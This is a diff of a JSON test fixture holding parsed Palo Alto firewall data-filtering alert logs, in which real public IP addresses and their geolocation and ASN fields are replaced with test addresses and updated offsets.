- "network.community_id": "1:I0nRW7fXHKg0He8sWEMh90mqrd8=",
+ "network.community_id": "1:N/Bc1RgG30q1Owz0DWHR2yEwN44=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -7725,8 +7398,8 @@
 "panw.panos.virtual_sys": "vsys1",
 "related.ip": [
 "0.0.0.0",
- "192.168.0.2",
- "74.125.239.20"
+ "1.128.3.4",
+ "192.168.0.2"
 ],
 "related.user": [
 "picard"
@@ -7736,16 +7409,11 @@
 "server.port": 53809,
 "server.user.name": "picard",
 "service.type": "panw",
- "source.address": "74.125.239.20",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.address": "1.128.3.4",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
 "source.geo.name": "United States",
- "source.ip": "74.125.239.20",
+ "source.ip": "1.128.3.4",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7754,7 +7422,7 @@
 },
 {
 "@timestamp": "2012-04-09T08:08:08.000-02:00",
- "client.ip": "208.80.154.225",
+ "client.ip": "67.43.156.12",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7770,7 +7438,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -7782,9 +7450,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 32333,
+ "log.offset": 32215,
 "network.application": "web-browsing",
- "network.community_id": "1:W08oA4XVHxagaCryNLen9OoTnPk=",
+ "network.community_id": "1:mSmmKo9krpIsh+2qFAZoA8nMDhg=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -7816,7 +7484,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "208.80.154.225"
+ "67.43.156.12"
 ],
 "related.user": [
 "picard"
@@ -7826,16 +7494,15 @@
 "server.port": 55912,
 "server.user.name": "picard",
 "service.type": "panw",
- "source.address": "208.80.154.225",
- "source.as.number": 14907,
- "source.as.organization.name": "Wikimedia Foundation Inc.",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.address": "67.43.156.12",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
 "source.geo.name": "United States",
- "source.ip": "208.80.154.225",
+ "source.ip": "67.43.156.12",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7844,7 +7511,7 @@
 },
 {
 "@timestamp": "2012-04-09T08:08:44.000-02:00",
- "client.ip": "208.80.154.234",
+ "client.ip": "81.2.69.145",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7860,7 +7527,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,81.2.69.145,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -7873,9 +7540,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 32720, + "log.offset": 32600, "network.application": "web-browsing", - "network.community_id": "1:tvB7u/5+rW38IXXGXjbdYYdzJ5s=", + "network.community_id": "1:03rrdI/L+dbrLea/vrQULMTFqvU=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -7907,7 +7574,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "208.80.154.234" + "81.2.69.145" ], "related.user": [ "picard" 
@@ -7917,16 +7584,17 @@ "server.port": 55916, "server.user.name": "picard", "service.type": "panw", - "source.address": "208.80.154.234", - "source.as.number": 14907, - "source.as.organization.name": "Wikimedia Foundation Inc.", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "208.80.154.234", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 80, "tags": [ "forwarded", @@ -7935,7 +7603,7 @@ }, { "@timestamp": "2012-04-09T08:16:57.000-02:00", - "client.ip": "65.54.75.25", + "client.ip": "67.43.156.14", "client.port": 80, "destination.address": "192.168.0.6", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -7951,7 +7619,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,67.43.156.14,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -7964,9 +7632,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 33097, + "log.offset": 32974, "network.application": "web-browsing", - "network.community_id": "1:LvKTW1EWi7nem/oAlX14Sg2W9kU=", + "network.community_id": "1:bJxw0tI76mNYOiv1ZJjBXdDpnTU=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -7998,7 +7666,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.6", - "65.54.75.25" + "67.43.156.14" ], "related.user": [ "jordy" 
@@ -8008,19 +7676,15 @@ "server.port": 1046, "server.user.name": "jordy", "service.type": "panw", - "source.address": "65.54.75.25", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", - "source.geo.city_name": "Los Angeles", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 34.0544, - "source.geo.location.lon": -118.244, + "source.address": "67.43.156.14", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, "source.geo.name": "United States", - "source.geo.region_iso_code": "US-CA", - "source.geo.region_name": "California", - "source.ip": "65.54.75.25", + "source.ip": "67.43.156.14", "source.port": 80, "tags": [ "forwarded", @@ -8029,7 +7693,7 @@ }, { "@timestamp": "2012-04-09T04:06:41.000-02:00", - "client.ip": "74.125.224.206", + "client.ip": "175.16.199.1", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -8045,7 +7709,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8057,9 +7721,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 33500, + "log.offset": 33378, "network.application": "google-maps", - "network.community_id": "1:Iur0h7DmmxbVfmJ8EKqn0v73b88=", + "network.community_id": "1:h4FhwHd9ztu4jpl3xgOaiB011a4=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8090,8 +7754,8 @@ "panw.panos.virtual_sys": "vsys1", "related.ip": [ "0.0.0.0", - "192.168.0.2", - "74.125.224.206" + "175.16.199.1", + "192.168.0.2" ], "related.user": [ "jordy" 
@@ -8101,16 +7765,17 @@ "server.port": 61734, "server.user.name": "jordy", "service.type": "panw", - "source.address": "74.125.224.206", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "175.16.199.1", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, "source.geo.name": "United States", - "source.ip": "74.125.224.206", + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "source.port": 80, "tags": [ "forwarded", @@ -8119,7 +7784,7 @@ }, { "@timestamp": "2012-04-09T04:12:52.000-02:00", - "client.ip": "74.125.224.195", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -8135,7 +7800,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8147,9 +7812,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 33873, + "log.offset": 33749, "network.application": "google-maps", - "network.community_id": "1:n3f9RX9U3DOM57vpn8aB1QSo2Yw=", + "network.community_id": "1:dULQBKOE61wtZ1QM6GKohdrM1GE=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8181,7 +7846,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.195" + "81.2.69.143" ], "related.user": [ "jordy" 
@@ -8191,16 +7856,17 @@ "server.port": 62292, "server.user.name": "jordy", "service.type": "panw", - "source.address": "74.125.224.195", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.195", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 80, "tags": [ "forwarded", @@ -8209,7 +7875,7 @@ }, { "@timestamp": "2012-04-09T06:07:49.000-02:00", - "client.ip": "207.178.96.34", + "client.ip": "67.43.156.12", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -8225,7 +7891,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8238,9 +7904,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 34246, + "log.offset": 34119, "network.application": "rss", - "network.community_id": "1:K6mY9EnrwYs1/a01d++OZ3kna2g=", + "network.community_id": "1:DLYH0WNYoXQ93i3rnp9QFsh63iM=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8272,7 +7938,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "207.178.96.34" + "67.43.156.12" ], "related.user": [ "jordy" 
@@ -8282,19 +7948,15 @@ "server.port": 64669, "server.user.name": "jordy", "service.type": "panw", - "source.address": "207.178.96.34", - "source.as.number": 20376, - "source.as.organization.name": "Hubris Communications", - "source.geo.city_name": "Liberal", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.0438, - "source.geo.location.lon": -100.9286, + "source.address": "67.43.156.12", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, "source.geo.name": "United States", - "source.geo.region_iso_code": "US-KS", - "source.geo.region_name": "Kansas", - "source.ip": "207.178.96.34", + "source.ip": "67.43.156.12", "source.port": 80, "tags": [ "forwarded", @@ -8303,7 +7965,7 @@ }, { "@timestamp": "2012-04-09T06:48:44.000-02:00", - "client.ip": "74.125.224.195", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -8319,7 +7981,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8331,9 +7993,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 34614, + "log.offset": 34486, "network.application": "google-maps", - "network.community_id": "1:u89cWOeFF4sWlYYJHVB+nr6g6Qg=", + "network.community_id": "1:jorKmgA/OY669gtX62Fasc1iKGc=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8365,7 +8027,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.195" + "81.2.69.143" ], "related.user": [ "picard" 
@@ -8375,16 +8037,17 @@ "server.port": 65265, "server.user.name": "picard", "service.type": "panw", - "source.address": "74.125.224.195", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.195", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 80, "tags": [ "forwarded", @@ -8393,7 +8056,7 @@ }, { "@timestamp": "2012-04-09T06:48:59.000-02:00", - "client.ip": "74.125.239.20", + "client.ip": "1.128.3.4", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -8409,7 +8072,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,1.128.3.4,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8421,9 +8084,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 34989, + "log.offset": 34858, "network.application": "web-browsing", - "network.community_id": "1:QmMWJ0pdk04yRgDj9m6OAKnXpDY=", + "network.community_id": "1:v/xhtv/qhJVgrOjMPvPqMWlrHXA=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8454,8 +8117,8 @@ "panw.panos.virtual_sys": "vsys1", "related.ip": [ "0.0.0.0", - "192.168.0.2", - "74.125.239.20" + "1.128.3.4", + "192.168.0.2" ], "related.user": [ "picard" 
@@ -8465,16 +8128,11 @@ "server.port": 64979, "server.user.name": "picard", "service.type": "panw", - "source.address": "74.125.239.20", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "1.128.3.4", + "source.as.number": 1221, + "source.as.organization.name": "Telstra Pty Ltd", "source.geo.name": "United States", - "source.ip": "74.125.239.20", + "source.ip": "1.128.3.4", "source.port": 80, "tags": [ "forwarded", @@ -8483,7 +8141,7 @@ }, { "@timestamp": "2012-04-09T06:50:14.000-02:00", - "client.ip": "66.152.109.24", + "client.ip": "81.2.69.193", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", @@ -8499,7 +8157,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", 
@@ -8512,9 +8170,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 35360, + "log.offset": 35225, "network.application": "web-browsing", - "network.community_id": "1:d3Kvg96HWrCNAfAK3vx2Uqglkdo=", + "network.community_id": "1:lM6ErOc/Uj5ui7hk5LvnxpCB/K0=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8546,7 +8204,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "66.152.109.24" + "81.2.69.193" ], "related.user": [ "picard" @@ -8556,19 +8214,17 @@ "server.port": 49432, "server.user.name": "picard", "service.type": "panw", - "source.address": "66.152.109.24", - "source.as.number": 13536, - "source.as.organization.name": "First Light Fiber", - "source.geo.city_name": "Albany", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 42.7008, - "source.geo.location.lon": -73.8601, + "source.address": "81.2.69.193", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.geo.region_iso_code": "US-NY", - "source.geo.region_name": "New York", - "source.ip": "66.152.109.24", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": 80, "tags": [ "forwarded", @@ -8577,7 +8233,7 @@ }, { "@timestamp": "2012-04-09T06:51:34.000-02:00", - "client.ip": "74.125.224.200", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -8593,7 +8249,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -8605,9 +8261,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 35737, + "log.offset": 35600, "network.application": "google-maps", - "network.community_id": "1:+c2DVc+anjtRZ3iRsjbG51UM+JA=", + "network.community_id": "1:AFqpyz1JYwEsC+Bm2Q7fspI+r8Y=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -8639,7 +8295,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "74.125.224.200" + "81.2.69.143" ], "related.user": [ "picard" 
@@ -8649,16 +8305,17 @@ "server.port": 49722, "server.user.name": "picard", "service.type": "panw", - "source.address": "74.125.224.200", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "United States", - "source.ip": "74.125.224.200", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 80, "tags": [ "forwarded", 
@@ -8670,16 +8327,19 @@ "client.ip": "192.168.0.2", "client.port": 49681, "client.user.name": "picard", - "destination.address": "74.125.224.201", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, + "destination.address": "89.160.20.156", + "destination.as.number": 29518, + "destination.as.organization.name": "Bredband2 AB", + "destination.geo.city_name": "Link\u00f6ping", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "SE", + "destination.geo.country_name": "Sweden", + "destination.geo.location.lat": 58.4167, + "destination.geo.location.lon": 15.6167, "destination.geo.name": "United States", - "destination.ip": "74.125.224.201", + "destination.geo.region_iso_code": "SE-E", + "destination.geo.region_name": "\u00d6sterg\u00f6tland County", + "destination.ip": "89.160.20.156", "destination.port": 80, "event.action": "data_match", "event.category": [ 
